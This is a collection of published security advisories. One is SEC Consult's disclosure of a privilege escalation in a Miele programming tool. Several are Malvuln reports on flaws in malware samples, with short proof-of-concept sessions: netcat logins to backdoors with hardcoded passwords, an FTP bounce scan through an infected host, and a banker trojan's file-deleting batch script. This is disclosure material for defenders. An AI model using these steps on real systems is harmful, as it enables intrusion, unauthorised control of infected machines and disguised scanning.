<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220427-0 ><br />=======================================================================<br /> title: Privilege Escalation<br /> product: Miele Benchmark Programming Tool<br /> vulnerable version: at least 1.1.49 and 1.2.71<br /> fixed version: 1.2.72<br /> CVE number: CVE-2022-22521<br /> impact: Medium<br /> homepage: https://www.miele.com/<br /> found: 2022-01-24<br /> by: J. Kruchem (Office Vienna)<br /> W. Schober (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"There are many good reasons for choosing Miele. Since the company's founding in<br />1899, Miele has remained true to its "Immer Besser" brand promise. This means<br />that we will do all that we can to be "Immer Besser" (forever better) than our<br />competitors and "Immer Besser" (forever better) than we already are. For our<br />customers, this means the peace of mind of knowing that choosing Miele is a<br />good decision – and probably the decision of a lifetime."<br /><br />Source: https://www.mieleusa.com/c/about-us-9.htm<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patched version which should be installed immediately.<br /><br />An in-depth security analysis performed by security professionals is highly advised,<br />as the software may be affected from further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Privilege Escalation (CVE-2022-22521)<br />The path where the Miele Benchmark Programming Tool is installed is writable<br />for any user on the Windows operation system. This allows replacing the Uninstall<br />binary and thus an attacker gaining local admin privileges if uninstalled.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Privilege Escalation (CVE-2022-22521)<br />The Uninstall string can be found in the following registry entry:<br /><br />Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{<UUID of Miele Benchmark Programming>}<br /><br />The UninstallString field has the following value:<br /><br />UninstallString<br />"C:\MIELE_SERVICE\Miele Benchmark Programming Tool\Uninstall Miele Benchmark Programming Tool.exe" /allusers<br /><br />For exploitation, replace the "Uninstall Miele Benchmark Programming Tool.exe"<br />with a malicious binary and uninstall via Software Center or call the admin<br />and let them uninstall the Miele Benchmark Programming Tool.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested, which were the latest versions available<br />during the time of the test:<br /><br />* 1.1.49<br />* 1.2.71<br /><br />Other (lower) software versions may be affected as well.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-03-21: Contacting vendor through psirt@miele.com<br />2022-03-22: Vendor answered that they will check the provided information<br />2022-04-07: Vendor confirmed the vulnerability and answered with aim to fix it asap<br />2022-04-11: Vendor sent their advisory (including CVE) and fixed version<br />2022-04-27: Coordinated release of advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version v1.2.72 which can be downloaded here:<br /><br />https://www.miele.com/en/com/downloads-6770.htm<br /><br /><br />Workaround:<br />-----------<br />Adapt permissions of the C:\MIELE_SERVICE directory according to the least privilege<br />principle.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF J. Kruchem / @2022<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/58be35e792476d1c015df7853112d200.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.aegg <br />Vulnerability: Weak Hardcoded Credentials<br />Description: The malware listens on TCP port 8665. Authentication is required, however the password "Xc 2870508" is weak and hardcoded within the PE file.<br />Family: Agent<br />Type: PE32<br />MD5: 58be35e792476d1c015df7853112d200<br />Vuln ID: MVID-2022-0571<br />Dropped files: ck.reg<br />Disclosure: 04/26/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 8665<br />Welcome to XC Doc Server!<br />Login root<br />LoginFailed<br /><br />C:\nc64.exe x.x.x.x 8665<br />Welcome to XC Doc Server!<br />Login Xc 2870508<br />LoginOK<br /><br />ComputerName<br />DESKTOP-2C3IQHO<br />StartVideo<br />StartVideoOK<br />GetDrives<br />C:\<br />D:\<br />....<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/fb3ac3c9d808de7f4b5ede68715f658f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Downloader.Win32.Agent<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a PE file to the "Windows\System" directory granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Family: Agent<br />Type: PE32<br />MD5: fb3ac3c9d808de7f4b5ede68715f658f<br />Vuln ID: MVID-2022-0570<br />Dropped files: alg.exe<br />Disclosure: 04/26/2022 <br /><br />Exploit/PoC:<br />C:\>cacls \Windows\System\alg.exe<br />C:\Windows\System\alg.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br />C:\>dir \Windows\System\alg.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\Windows\System<br /><br />04/10/2022 01:18 AM 882,688 alg.exe<br /> 1 File(s) 882,688 bytes<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/fa00524d7289cdba327d5c34ab3d9bd7.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.GF.j<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 21554. Third-party adversaries who can reach infected hosts can run commands made available by the backdoor.<br /><br />Eg. commands<br />setport (change port)<br />RESETALL (resets to default port)<br />KillHER (terminates backdoor)<br /><br />Family: GF<br />Type: PE32<br />MD5: fa00524d7289cdba327d5c34ab3d9bd7<br />Vuln ID: MVID-2022-0566<br />Dropped files: Windll.exe <br />Disclosure: 04/26/2022<br /><br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 21554<br />setport 666<br />New port: 666<br />KillHER<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/851f8945d1b5923990f4722d627156a0_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Cafeini.b<br />Vulnerability: Port Bounce Scan<br />Description: The malware runs an FTP server on TCP port 23. Third-party adversaries who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you.<br />Family: Cafeini<br />Type: PE32<br />MD5: 851f8945d1b5923990f4722d627156a0<br />Vuln ID: MVID-2022-0569<br />Disclosure: 04/26/2022<br /><br />Exploit/PoC:<br />C:\>nmap -n -Pn -b test:test@192.168.18.125:23 -p21,22,80 192.168.18.237 -v<br />Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-20 14:50 UTC-11<br />Resolved FTP bounce attack proxy to 192.168.18.125 (192.168.18.125).<br />Attempting connection to ftp://test:test@192.168.18.125:23<br />Connected:220 CAFEiNi 1.1 FTP server<br />Login credentials accepted by FTP server!<br />Initiating Bounce Scan at 14:50<br />Removed 22<br />Changed my mind about port 22<br />Removed 21<br />Changed my mind about port 21<br />Discovered open port 80/tcp on 192.168.18.237<br />Completed Bounce Scan at 14:50, 2.21s elapsed (3 total ports)<br />Nmap scan report for 192.168.18.237<br />Host is up.<br /><br />PORT STATE SERVICE<br />21/tcp closed ftp<br />22/tcp closed ssh<br />80/tcp open http<br /><br />Read data files from: C:\Program Files (x86)\Nmap<br />Nmap done: 1 IP address (1 host up) scanned in 11.39 seconds<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/d859ba54086fd0313dc34b73b5b1eccb.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Downloader.Win32.Small.ahlq<br />Vulnerability: Insecure Permissions <br />Description: the malware creates a directory with insecure permissions under c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. <br />Family: Small<br />Type: PE32<br />MD5: d859ba54086fd0313dc34b73b5b1eccb<br />Vuln ID: MVID-2022-0567<br />Disclosure: 04/26/2022<br /><br /><br />Exploit/PoC:<br />C:\>cacls Temp<br />C:\Temp BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />C:\>dir Temp<br /> Volume in drive C has no label.<br /><br /> Directory of C:\Temp<br /><br />04/14/2022 04:03 AM 761,344 vjrgq12Server_Setup.exe<br /> 1 File(s) 761,344 bytes<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/c44a9580e17bad0aa27329e51b7d0ae0.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Virus.Win32.Qvod.b<br />Vulnerability: Insecure Permissions <br />Description: The malware writes a PE file with insecure permissions to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Family: Qvod<br />Type: PE32<br />MD5: c44a9580e17bad0aa27329e51b7d0ae0<br />Vuln ID: MVID-2022-0565<br />Dropped files: 53ce6641.exe <br />Disclosure: 04/26/2022<br /><br />Exploit/PoC:<br />C:\>cacls 53ce6641.exe<br />C:\53ce6641.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br />C:\>dir 53ce6641.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />04/02/2022 12:42 AM 89,392 53ce6641.exe<br /> 1 File(s) 89,392 bytes<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/a98cdaa89da57bf269873db63e22a939.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Email-Worm.Win32.Sidex<br />Vulnerability: Unauthenticated Remote Command Execution <br />Description: The malware listens on TCP port 5151 and creates a dir named "vortex" with several PE files. Third-party adversaries who can reach an infected host can run commands made available by the backdoor.<br />Family: Sidex<br />Type: PE32<br />MD5: a98cdaa89da57bf269873db63e22a939<br />Vuln ID: MVID-2022-0564<br />Dropped files:<br />107,520 373B2264.EXE<br />79,661 71483A49-00135168.EXE<br />4,096 72D90FF9.EXE<br />512 89C556A1.IMG<br />10,426 977E01C2.VBS<br />12,313 A54746DF.VBS<br />80,384 E09DF44A-00080384.EXE ==> server.exe<br />Disclosure: 04/26/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 5151<br />GetVicName;<br />GetVicName;Optix+Lite<br />GetSysDir;<br />TheSysDir;<br />;C:\WINDOWS\system32\<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/4243911d5ca5655d04de8895704fcae6.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Net-Worm.Win32.Kibuv.c<br />Vulnerability: Authentication Bypass<br />Description: The malware listens on TCP port 7955. Third-party adversaries who can reach infected systems can logon using any username/password combination.<br />Family: Kibuv<br />Type: PE32<br />MD5: 4243911d5ca5655d04de8895704fcae6<br />Vuln ID: MVID-2022-0563<br />Disclosure: 04/26/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 7955<br />220 StnyFtpd 0wns j0<br />USER malvuln<br />331 Password required<br />PASS malvuln<br />230 User logged in.<br />SYST<br />215 StnyFtpd<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source:<br />https://malvuln.com/advisory/f15d05f74899324ecb61ee29ad162fad.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Banker.Win32.Banker.heq<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a BAT script file with insecure permissions<br />to c drive granting change (C) permissions to the authenticated user group.<br />Standard users can rename the executable dropped by the malware to disable<br />it or replace it with their own executable. Then wait for a privileged user<br />to logon to the infected machine to potentially escalate privileges.<br />Family: Banker<br />Type: PE32<br />MD5: f15d05f74899324ecb61ee29ad162fad<br />Vuln ID: MVID-2022-0561<br />Disclosure: 04/26/2022<br /><br />Exploit/PoC:<br />C:\>cacls autoexec.bat<br />C:\autoexec.bat BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir autoexec.bat<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />04/13/2022 02:27 AM 636 autoexec.bat<br /> 1 File(s) 636 bytes<br /><br /><br />c:\>type autoexec.bat<br /><br />@echo off<br />del c:\windows\downlo~1\ABN*.*<br />del c:\windows\downlo~1\*ABN*.*<br />del c:\windows\downlo~1\GBPDIST.DLL<br />del c:\windows\downlo~1\scp*.*<br />del c:\windows\downlo~1\gb*.*<br />del c:\windows\downlo~1\*gb*.*<br />del c:\windows\downlo~1\*UNI*.*<br />del c:\windows\downlo~1\UNI*.*??<br />del c:\WINDOWS\system32\Logof.dll<br />del c:\arquiv~1\GbPlugin\gb*.*<br />del c:\arquiv~1\GbPlugin\g*.*<br />del c:\windwos\system32\snengine.exe<br />del c:\windwos\system32\snagos.exe<br />del c:\arquiv~1\Scpad\*scp*.??<br />del c:\arquiv~1\Scpad\scp*.*<br />del c:\windows\downlo~1\ATM*.*<br />del c:\windows\downlo~1\*ATM*.*<br />del c:\arquiv~1\Scpad\*ssh*.*<br />del c:\arquiv~1\Scpad\*ssh*.?<br /><br /><br />Disclaimer: The information contained within this advisory is supplied<br />"as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory,<br />provided that it is not altered except by reformatting it, and that due<br />credit is given. Permission is explicitly given for insertion in<br />vulnerability databases and similar, provided that due credit is given to<br />the author. The author is not responsible for any misuse of the information<br />contained herein and accepts no responsibility for any damage caused by the<br />use or misuse of this information. The author prohibits any malicious use<br />of security related information or exploits by the author or elsewhere. Do<br />not attempt to download Malware samples. The author of this website takes<br />no responsibility for any kind of damages occurring from improper Malware<br />handling or the downloading of ANY Malware mentioned on this website or<br />elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>